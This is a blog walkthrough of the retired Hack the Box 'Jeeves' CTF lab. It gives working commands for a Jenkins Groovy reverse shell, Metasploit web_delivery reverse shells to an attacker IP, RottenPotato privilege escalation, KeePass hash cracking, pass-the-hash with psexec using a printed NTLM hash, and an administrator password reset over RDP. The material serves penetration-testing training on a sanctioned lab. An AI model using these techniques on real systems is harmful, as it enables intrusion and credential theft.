Hack the Box Challenge: Jeeves Walkthrough

at 9:52 AM Monday, May 21, 2018

Hello Friends!! Today we are going to solve another CTF Challenge “Jeeves”. This VM is also developed by Hack the Box, Jeeves is a Retired Lab and there are multiple ways to breach into this VM. In this lab, we have escalated root privilege in 3 different ways and for completing the challenge of this VM we took help from Tally (Hack the box).
Level: Medium
Task: Find the user.txt and root.txt in the vulnerable Lab.
Let’s Begin!!
As these labs are only available online, therefore, they have a static IP. Jeeves Lab has IP: 10.10.10.63.
Now, as always let’s begin our hacking with the port enumeration.
nmap -A 10.10.10.63
Looking around its result we found ports 22, 80, 135, 445 and 50000 are open, and moreover, port 135 and 445 was pointing towards Windows operating system.




Subsequently, first we checked web service and explored target IP in a web browser and it was put up by “Ask Jeeves search engine” webpage. So we try to search some website such as google.com and a new web page represented by the fake error page come up in front of us.




 On port 50000 in a Web browser give us to HTTP 404 Error page.




Then we decide to use OWASP Dirbuster for directory brute force attack.




From its result, we found so many directories but we drive with /askjeeves for further process.




So when we had explored 10.10.10.63:50000/askjeeves it lead us to “Jenkins Dashboard”. Ahhh!! It was WOW moment for us because we knew that there are so many methods to exploit Jenkins. Thus we move inside "Manage Jenkins" options as it was the spine and abusing it was quite soothing.




There were so many options but we were interested in Script Console because Jenkins has very nice Groovy script console that allows someone to execute arbitrary Groovy scripts within the Jenkins master runtime.




We found Java reverse shell from GitHub, so we copied the code and modified its localhost and port as per our specification.




Then we start Netcat listener and run above Groovy Script to access victim's reverse connection. From below image, you can observe that we access tty shell of victim’s machine.




As we love meterpreter shell therefore we load metasploit framework and execute below commands.
use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 2
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 10.10.14.28
msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.28
msf exploit(multi/script/web_delivery) > exploit

Copy the highlighted text for powershell.exe and Paste it inside CMD shell as shown in next image.




Paste above malicious code here in netcat.




You will get meterpreter session of victim’s machine in your Metasploit framework and after then finished the task by grabbing user.txt and root.txt file. Further type following:
getuid
But currently we don’t have NT AUTHORITY\SYSTEM permission. But we knew the techniques that we have used in Tally CTF for gaining NT AUTHORITY\SYSTEM permission.




Therefore taking help from our previous article “Tally” we executed below commands and successfully gained NT AUTHORITY\SYSTEM permission
upload /root/Desktop/RottenPotato/rottenpotato.exe .
load incognito
execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"
getuid




Let me tell you this, that we have solved so many CTF challenges of Hack the Box among them some was framed using Windows Operating system and we always grabbed the user.txt file from inside some a folder that owned by any username and root.txt form inside Administrator folder and both these folders are present inside C:\Users
Similarly, you can observe the same thing here also and might be you got my intention of above said words. So let’s grab user.txt file first from inside /kohsuke/Desktop.
COOL!!! We have captured the 1st flag.




Then we go for root.txt file, BUT it was a little bit tricky to get the root.txt file. Because the author has hide root.txt file by using some ADS technique (Windows Alternate Data Streams) and to grab that file, you can execute below commands.
cd Administrator
cd Desktop
ls-al
cat hm.txt
dir /R
more < hm.txt:root.txt




Hurray!! R flag with dir command discloses root.txt file and  We successfully completed the 2nd task.




2nd Method
When you have fresh meterpreter session 1 then move into /document directory and download CEH.kdbx file. Here also we took help from our previous article TALLY.




Now run the python script that extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases.
python keepass2john.py CEH.kdbx > passkey
Next, we have used John the ripper for decrypting the content of “passkey” with help of the following command.
john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt passkey
so we found the master key "moonshine1" for keepass2 which is an application used for hiding passwords of your system then you need to install it (keepass2) using the following command.
apt-get install keepass2 -y




After installing, run the below command and submit “moonshine1” in the field of the master key.
keepass2 tim.kdbx




Inside CEH we found so many credential, we copied all password from here and past into a text file and got few password and one NTLM hash value: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00




use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > set rhost 10.10.10.63
msf exploit(windows/smb/psexec) > set smbuser administrator
msf exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
msf exploit(windows/smb/psexec) > set lport 8888
msf exploit(windows/smb/psexec) > exploit

Awesome!!! We have meterpreter session 2 with proper NT AUTHORITY\SYSTEM permission, now use above steps to get the root.txt file.
Note: we have rebooted the target’s VM before starting 2nd method.




At the time when you have fresh meterpreter session2 (via psexec) then execute the following command to enable remote desktop service in victim's machine.
run getgui -e
shell
Now we have victim’s command prompt with administrator privilege thus we can change User administrator password directly by using net user command.
net user administrator 123




Now open a new terminal in your Kali Linux and type rdesktop 10.10.10.63 command to access remote desktop services of victim’s machine and after that submit credential administrator: 123 for login.
BOOOOOM!!! Look at the screen of our victim, now let’s grab the root flag and enjoy this GUI mode.




Finding user.txt is quite easy you can try by your own. To grab root.txt flag open the CMD prompt and type following command ad done above.
dir /R
more < hm.txt:root.txt

Enjoy Hacking!!!!


Labels:

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)